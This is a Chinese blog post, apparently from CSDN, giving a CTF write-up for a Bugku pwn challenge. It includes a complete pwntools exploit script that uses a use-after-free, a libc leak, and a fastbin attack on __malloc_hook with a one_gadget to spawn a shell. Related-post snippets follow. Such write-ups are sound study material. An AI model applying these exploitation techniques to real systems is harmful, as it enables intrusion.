记一次bugku pwn题解4月27日

最新推荐文章于 2023-04-01 18:28:56 发布
最新推荐文章于 2023-04-01 18:28:56 发布
阅读量499 收藏
点赞数 2
分类专栏: bugku awd 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124459786
版权

记一次bugku pwn题解4月27日

emmmm,远程环境很垃圾(2.19-0ubuntu6.15),笔者patchelf的时候才想起来没有2.19,所以直接用2.23。利用realloc调整了好多次都打不通。。。。。换了四次gadget从0一直测试到realloc+0x30。。。。(没意思,其实可以利用其他方式,比如fsop,当时想着可能马上就可以通了就没有再高兴换了。。
在这里插入图片描述
uaf漏洞一枚,还可以edit,直接fastbin attack乱杀。快速写完初始exp发现了一个很ganga的事情,打不通本地和远程,那就利用realloc来调整一下呗。realloc + 0本地直接成功,远程就是打不通。。。。。
一开始保护也没看,可以直接改got表。。。总结来说就是太飘了。。。。
题目链接:z1r0’s github
这里给出本地的exp

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 0
if debug:
    r = remote('192-168-1-192.pvp1029.bugku.cn', 9999)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Command:'

def add(size):
    r.sendlineafter(menu, '1')
    r.sendlineafter('size:', str(size))

def edit(index, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index:', str(index))
    r.sendafter('Content:', content)

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Index:', str(index))

def delete(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Index:', str(index))

add(0x80)   #0
add(0x60)   #1
add(0x60)   #1
add(0x60)   #3
add(0x10)   #4
delete(4)
edit(4, '/bin/sh')


delete(0)
show(0)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
success('malloc_hook = ' + hex(malloc_hook))

#libc = ELF('./libc.so.6')
libc = ELF('./2.23/libc.so.6')
libc_base = malloc_hook - libc.sym['__malloc_hook']
#one = [0x46428, 0x4647c, 0xe9415, 0xea36d]
one = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
one_gadget = one[0] + libc_base
realloc_hook = libc_base + libc.sym['realloc']
system_addr = libc_base + libc.sym['system']

add(0x80) #5
delete(1)
p1 = p64(malloc_hook - 0x23)
edit(1, p1)

add(0x60)   #6
add(0x60)   #7
p2 = b'a' * 0xb + p64(one_gadget) + p64(realloc_hook)
edit(7, p2)

add(0x30)

r.interactive()

这里笔者差忘记一个点,ida反汇编的时候switch这里会失败,看汇编的时候有一个垃圾数据nop掉就行。
在这里插入图片描述
在这里插入图片描述
再接再厉吧仔细点仔细点。。。

z1r0.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BugKu做题录【pwn】(持续更新中)
Assassin
04-06 3098
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
Bugku——瑞士军刀——pwn
2301_77163106的博客
08-20 290
我们可以很清楚看到有flag文件,进行抓取使用命令cat 相应文件--->cat flag,得到flag。回车并输入查找命令ls(可以了解一些其他的==>接下来我们只要访问他就行了打开kali进入终端。进入终端窗口输入 nc ip 端口。点击进入(也可以点击鼠标右键)题目给我们 nc ip 端口。
BUUCTF rip
qq_36995313的博客
10-10 324
BUUCTF rip 程序分析 国际惯例checksec一下 什么保护都没开,那么就有n多种方式来getshell,但是我们追求最简单的方法。 程序是64位的,我们用ida64打开,F5查看程序运行流程 可以一个gets函数,一个很明显的漏洞点,可以直接溢出,然后我们看一下程序里面有哪些字符串 这里有一个/bin/sh字符串,一看就知道不简单 双击字符串,可以看到/bin/sh在程序内存中的存放位置 然后右键->Xrefs graph to可以看到是哪个函数使用了这个字符串 可以看到是一
Bugku PWN Easy_int
JEWSWS的博客
04-01 329
【春风不解语,独做狮子吟。】
pwn system(“/bin/sh“)失败的原因
weixin_42016744的博客
01-11 1879
这里写自定义目录标题现象原因 现象 栈溢出做pwn 题跳转到system("/bin/sh")报错 打开gdb调试发现报错: 得知glibc2.27以后引入xmm寄存器, 录程序状态, 会执行movaps指令, 要求rsp是按16字节对齐的, 所以如果payload这样写 payload = cyclic(0x20 + 8) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) 弹出的数据是奇数个, 本地就会报错 但是改成偶数个pop payl
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 3925
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
bugku-pwn-瑞士军刀 overflow2
m0_57954651的博客
01-13 1319
在klai中使用file命令查看文件类型 可以看到是64位。system函数的地址是0×40043F。使用IDA 64 Pro打开文件 查看主函数。利用Kali连接 ls查看。给了个nc和文件 下载。
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 1958
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
0ctf_2017_babyheap
u014377094的博客
03-10 456
本人double free+fastbin攻击第一道题,看了两天,好在理解下来不难。 参考传送门[分享]0ctf2017 - babyheap-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com 惯例checksec一下 打开ida 1创建chunk,按1,2依次创建,2往里写,3free掉指定数字chunk,4print出指定chunk内容 不建议跟ida里一些函数死磕,硬读会恶心到,理解就ok。 这里先放exp,读一遍exp咱们再来解释 from pwn import
Bugku CTF 题目解析 (1-10题)
热门推荐
半夜好饿的博客
09-28 1万+
写在前面的话: 这里只是录一些自己的解题思路,或者一些有关解题的乱七八糟的东西,自己是刚零基础接触这方面的东西,所以有表述不当的地方请包容,在此谢过! 1、web2 点开网址后: 解题思路:F12 打开 开发者工具看看,可以看到需要寻找的flag。 将其复制到提交框即可。 flag: KEY{Web-2-bugKssNNikls9100} 2、计算器 点开网址后: 解题思路:先提交答案...
bugku pwn2
doudoudedi
06-04 1689
这道题是一道简单的栈溢出 直接用IDA查看 很明显的得到flag的函数 直接上exp from pwn import * p=remote('114.116.54.89',10003) p.recvuntil('something?') payload='a'*56+p64(0x400751) p.sendline(payload) p.interactive() ...
BugkuCTF多种方法解决
qq_40624810的博客
06-09 4221
链接下载压缩包,解压后得到一个zip压缩包,解压后是个exe文件,无法打开。放入winhex下分析,右边是一串类似base64编码的字符串。 题目说在做题过程中会得到一个二维码图片,百度了下图片和base64可以转化。用在线工具转化可以得到一个二维码扫描就是flag. 注意在用转化工具的时候要追加img标签。 ...
BugkuCTF pwn题第一弹
weixin_43489686的博客
09-09 2092
BugkuCTF pwn题第一弹
ctf.bugku ctf题目详解——pwn2
yeshen4328的专栏
05-26 1125
ctf.bugku ctf题目详解——pwn2 题目 程序分配了一个栈上的变量s,长度为0x30,并一开始置0. 9行开始从外部读取0x100的数据到s中,由此可见此处存在一个栈溢出。 同时使用ida打开程序之后发现还存在一个get_shell的函数: 于是我们需要想方法利用溢出来调用这个get_shell函数。 x64函数调用规则 解题之前我们先学习下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e
那么怎么打开一个pwn题呢
最新发布
09-11
### 回答1: 打开一个 Pwn 题需要以下几个步骤: 1. 下载并安装 Pwn 工具集。Pwn 工具集包括 GDB、IDA Pro、pwntools 等工具,可以帮助你进行 Pwn 题目的分析和攻击。你可以在官网上下载并安装 Pwn 工具集。 2. 阅读题目描述和提示。Pwn 题目通常会提供一些提示和描述,让你了解该题目的基本信息和攻击思路。 3. 分析漏洞点。在进行 Pwn 题目攻击之前,你需要先找到漏洞点。这可能需要你分析题目代码、反汇编二进制文件、使用调试器等方式。 4. 构造 payload。一旦你找到了漏洞点,你需要构造 payload 来利用该漏洞。payload 可以是一段 shellcode 或者其他恶意代码,它可以让你在目标程序中执行任意代码。 5. 执行攻击。最后,你需要执行攻击并验证是否成功。你可以使用 Pwn 工具集中的工具来验证攻击是否成功,例如使用 GDB 调试实时查看程序的状态。 需要注意的是,Pwn 题目是比较复杂的,需要一定的计算机系统知识和技能。因此,在进行 Pwn 题目攻击之前,建议你先学习一些基础知识,例如计算机系统原理、汇编语言、C 语言等。 ### 回答2: 要打开一个pwn题,首先需要了解pwn题的基本知识和入门技巧。Pwn题通常是指有漏洞可以进行攻击的二进制程序。下面是打开一个pwn题的一般步骤: 1. 了解目标:阅读题目描述和相关信息,了解题目的背景故事、要求和限制条件。同时,检查题目文件的属性和权限。 2. 查看源代码:如果有提供的源代码,应该仔细阅读以了解其中的漏洞和可能的攻击点。关注包含用户输入的部分,如输入函数、变量声明和参数传递等。 3. 漏洞分析:根据题目类型和源代码,分析可能存在的漏洞类型。常见的漏洞类型包括缓冲区溢出、格式化字符串漏洞、堆溢出等。 4. 构造攻击载荷:根据对漏洞的分析,构造相应的攻击载荷。这可以是一系列的输入,以便利用漏洞触发特定的目标操作。 5. 调试程序:使用调试器(例如gdb)加载目标程序并跟踪代码的执行过程。这有助于理解程序的行为以及找到攻击载荷的正确位置。 6. 利用漏洞进行攻击:在调试过程中,找到合适的位置并向目标程序输入构造的攻击载荷。这可能会导致目标程序发生崩溃或执行任意代码。 7. 获取权限或执行目标操作:根据题目要求,尝试获取目标操作的权限或执行特定的操作。这可能需要进一步的攻击,例如提权、绕过安全机制等。 8. 编写脚本或自动化攻击:完成手动攻击后,可以根据需要编写脚本或使用自动化工具来自动化攻击过程,以便更高效地解决类似的问题。 总之,打开一个pwn题需要对二进制程序的漏洞和攻击技术有一定的了解,并且需要进行分析、调试和尝试不同的方法来攻击目标。不同的pwn题可能需要不同的技术和思路,因此需要不断学习和实践来提高自己的能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值